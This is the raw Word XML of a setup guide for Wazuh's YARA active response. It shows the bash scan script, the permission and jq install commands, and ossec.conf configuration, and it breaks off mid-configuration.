              <w:t>#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BC8CCD" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Wazuh - Yara active response</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="677257FB" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Copyright (C) 2015-2022, Wazuh Inc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A62B46" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D6F646" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># This program is free software; you can redistribute it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B286BE" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># and/or modify it under the terms of the GNU General Public</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E7DA0C" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># License (version 2) as published by the FSF - Free Software</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA4F2F3" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Foundation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09092009" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E1E9EE2" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E11AC11" w14:textId="26B4251E" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>#------------------------- Gather parameters -------------------------#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7702DDD1" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Extra arguments</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44048C5E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>read INPUT_JSON</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D89CC49" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>YARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6EFA11" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7C273A" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF9E017" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C16D4A8" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Set LOG_FILE path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E90613" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>LOG_FILE="logs/active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509AE6F6" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="619B3FF6" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>size=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF19CFB" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>actual_size=$(stat -c %s ${FILENAME})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F201025" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>while [ ${size} -ne ${actual_size} ]; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C180F71" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    sleep 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32153E24" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    size=${actual_size}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73FDA79E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    actual_size=$(stat -c %s ${FILENAME})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65144F9B" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573EED36" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="241F0CC8" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>#----------------------- Analyze parameters -----------------------#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563A182A" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DBDF65A" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BA08E2C" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:lastRenderedPageBreak/>
              <w:t>then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697AFFA7" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    echo "wazuh-yara: ERROR - Yara active response error. Yara path and rules parameters are mandatory." &gt;&gt; ${LOG_FILE}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAEA96C" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    exit 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA66275" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731C149E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EE38A7C" w14:textId="67BBB24D" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>#------------------------- Main workflow --------------------------#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A44B4C7" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t># Execute Yara scan on the specified filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D80857" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>yara_output="$("${YARA_PATH}"/yara -w -r "$YARA_RULES" "$FILENAME")"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C4C77A" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52254CF0" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>if [[ $yara_output != "" ]]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C05872D" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1FC114" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    # Iterate every detected rule and append it to the LOG_FILE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3F26A9" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    while read -r line; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBAE7C0" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">        echo "wazuh-yara: INFO - Scan result: $line" &gt;&gt; ${LOG_FILE}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3659A018" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">    done &lt;&lt;&lt; "$yara_output"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275F8F90" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18134ECC" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B417B2D" w14:textId="37C2A687" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>exit 0;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B60853C" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00853252">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E69436" w14:textId="2091F1DA" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Change the script ownership and permission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rsidRPr="001E2C55" w14:paraId="6411071D" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AE5E7E0" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo chmod 750 /var/ossec/active-response/bin/yara.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A0CB1E2" w14:textId="30FD3C71" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo chown root:wazuh /var/ossec/active-response/bin/yara.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="464BADE0" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00853252">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E27C2EC" w14:textId="034375DB" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Install the jq utility to process the JSON data from the FIM alerts</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110652" w14:paraId="4732BE48" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D88E129" w14:textId="0B145AF1" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo apt install -y jq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0F6E50" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A74012F" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00192EF2" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192EF2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the directory to monitor in ossec conf : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E57F1" w14:textId="151DBB9B" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F25940">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;directories check_all="yes" realtime="yes"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tmp/apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25940">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DE76C" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A79307E" w14:textId="2175062F" w:rsidR="00386775" w:rsidRPr="00386775" w:rsidRDefault="00386775" w:rsidP="00386775">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wazuh server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C26AA0" w14:textId="46464098" w:rsidR="00110652" w:rsidRPr="00386775" w:rsidRDefault="00386775">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Add the custom decoders to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/var/ossec/etc/decoders/local_decoder.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760BDA3B" w14:textId="57F28D87" w:rsidR="00386775" w:rsidRDefault="00386775">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Add the custom rules to the /var/ossec/etc/rules/local_rules.xml file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8529B7" w14:textId="06B84F02" w:rsidR="00386775" w:rsidRPr="00301EFF" w:rsidRDefault="00386775">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configure the execution of the YARA script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh server </w:t>
      </w:r>
      <w:r w:rsidRPr="00386775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/var/ossec/etc/ossec.conf</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386775" w14:paraId="77EBDC3F" w14:textId="77777777" w:rsidTr="00301EFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A3FC21A" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t>&lt;ossec_config&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B0630BF" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">  &lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0788C5F0" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;name&gt;yara_linux&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="251E44A8" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;executable&gt;yara.sh&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153CAAEA" w14:textId="65054463" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;extra_args&gt;-yara_path /usr/local/bin -yara_rules </w:t>
            </w:r>
            <w:r w:rsidR="00815142" w:rsidRPr="00815142">
              <w:t>/var/ossec/etc/yara/rules/yara_rules.yar</w:t>
            </w:r>
            <w:r w:rsidRPr="00301EFF">
              <w:t>&lt;/extra_args&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53758A3B" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;timeout_allowed&gt;no&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F44CE40" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">  &lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA95EC4" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15A5662A" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">  &lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054D0E89" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783356DD" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;command&gt;yara_linux&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
